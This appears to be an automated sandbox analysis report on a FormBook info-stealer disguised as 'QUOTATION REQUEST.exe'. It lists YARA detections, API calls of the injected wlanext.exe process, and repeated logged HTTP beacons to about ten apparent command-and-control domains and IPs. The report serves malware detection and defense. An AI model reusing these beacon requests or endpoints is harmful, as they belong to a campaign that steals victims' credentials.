Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al HTTP/1.1Host: www.letsratethis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al HTTP/1.1Host: www.cannabisllp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al HTTP/1.1Host: www.buffalobooze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al HTTP/1.1Host: www.checkmytradesmanswork.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al HTTP/1.1Host: www.inthebeginningshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al HTTP/1.1Host: www.madisonroselove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al HTTP/1.1Host: www.pedroiniesta.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al HTTP/1.1Host: www.freecleanlimpieza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al HTTP/1.1Host: www.graet.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 46.30.211.38 46.30.211.38
Source: Joe Sandbox View	IP Address: 81.17.18.196 81.17.18.196

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al HTTP/1.1Host: www.letsratethis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al HTTP/1.1Host: www.cannabisllp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al HTTP/1.1Host: www.buffalobooze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al HTTP/1.1Host: www.checkmytradesmanswork.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al HTTP/1.1Host: www.inthebeginningshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al HTTP/1.1Host: www.madisonroselove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al HTTP/1.1Host: www.pedroiniesta.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al HTTP/1.1Host: www.freecleanlimpieza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al HTTP/1.1Host: www.graet.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.sloanksmith.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1364Connection: closeDate: Mon, 03 May 2021 14:51:02 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 7

Source: explorer.exe, 00000005.00000000.253105057.00000000089FF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: QUOTATION REQUEST.exe, 00000000.00000002.228172147.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: QUOTATION REQUEST.exe	String found in binary or memory: https://github.com/unguest
Source: QUOTATION REQUEST.exe	String found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: wlanext.exe, 00000009.00000002.485777582.0000000003D12000.00000004.00000001.sdmp	String found in binary or memory: https://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDW

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: QUOTATION REQUEST.exe

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004181C0 NtCreateFile,
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00418270 NtReadFile,
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004182F0 NtClose,
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004183A0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004182EF NtClose,
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004182BA NtReadFile,
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041839F NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036399A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036396E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036396D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036395D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A20 NtResumeThread,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A10 NtQuerySection,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036399D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036398F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036398A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639760 NtOpenProcess,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363A770 NtOpenThread,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036397A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639560 NtWriteFile,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03639520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036395F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE81C0 NtCreateFile,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE82F0 NtClose,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE8270 NtReadFile,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE83A0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE82EF NtClose,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE82BA NtReadFile,
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE839F NtAllocateVirtualMemory,

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_00C194A8
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_00C1C3A0
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_00C1A758
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_04C1C900
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0040102F
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00401030
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00401209
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041CB85
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00408C5D
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00408C60
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B4A3
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B4A6
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041BD74
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041C58C
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00402D90
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041CF94
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00402FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C2B28
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B03DA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BDBD2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362EBB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036AFA2B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C22AE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03614120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FF900
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036CE824
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1002
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C28EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C20A8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360B090
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C1FF1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036CDFCE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03616E30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BD616
